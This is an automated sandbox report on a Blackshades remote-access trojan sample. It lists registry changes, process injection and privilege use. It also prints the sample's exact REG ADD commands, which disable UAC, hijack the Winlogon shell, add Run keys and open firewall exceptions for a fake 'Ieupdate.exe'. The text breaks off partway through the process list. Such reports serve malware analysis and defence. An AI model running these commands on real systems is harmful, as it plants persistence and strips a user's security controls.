Malware Analysis Report

2025-04-03 10:09

Sample ID 250204-3lwxmszlfl
Target 65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410
SHA256 65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410
Tags
blackshades defense_evasion discovery persistence rat trojan upx
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410

Threat Level: Known bad

The file 65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410 was found to be: Known bad.

Malicious Activity Summary

blackshades defense_evasion discovery persistence rat trojan upx

Blackshades

Blackshades payload

Modifies WinLogon for persistence

UAC bypass

Modifies firewall policy service

Blackshades family

Adds policy Run key to start application

Boot or Logon Autostart Execution: Active Setup

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Checks whether UAC is enabled

Adds Run key to start application

Suspicious use of SetThreadContext

UPX packed file

Drops file in Program Files directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-02-04 23:36

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-04 23:36

Reported

2025-02-04 23:39

Platform

win7-20241010-en

Max time kernel

149s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe"

Signatures

Blackshades

rat blackshades

Blackshades family

blackshades

Blackshades payload

Description Indicator Process Target
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe, C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe" C:\Windows\SysWOW64\reg.exe N/A

Modifies firewall policy service

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files (x86)\Internet Explorer\Ieupdate.exe = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe:*:Enabled:Windows Messanger" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Users\Admin\AppData\Roaming\vb6.exe = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe:*:Enabled:Windows Messanger" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\SysWOW64\reg.exe N/A

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3} C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3} C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\IeUpdate = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\IeUpdate = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Checks whether UAC is enabled

defense_evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2308 set thread context of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 set thread context of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
File created C:\Program Files (x86)\Internet Explorer\Ieupdate.txt C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\Ieupdate.txt C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
File created C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 1 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeTcbPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSystemtimePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeBackupPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeAuditPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeUndockPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeManageVolumePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeImpersonatePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 31 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 32 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 33 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 34 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 35 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2824 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 3000 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3000 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2824 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2900 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2900 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2900 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2900 wrote to memory of 2752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2560 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2560 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2560 wrote to memory of 1876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2824 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2824 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2312 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2312 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2312 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2312 wrote to memory of 588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2824 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 2440 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 2308 wrote to memory of 1880 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

Processes

C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe

"C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\JNYVYK.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center /v UACDisableNotify /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\dQcxh.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "IeUpdate" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\POzYI.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "IeUpdate" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\aptNl.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "Explorer.exe, C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

"C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

"C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

"C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe:*:Enabled:Windows Messanger" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\cmd.exe

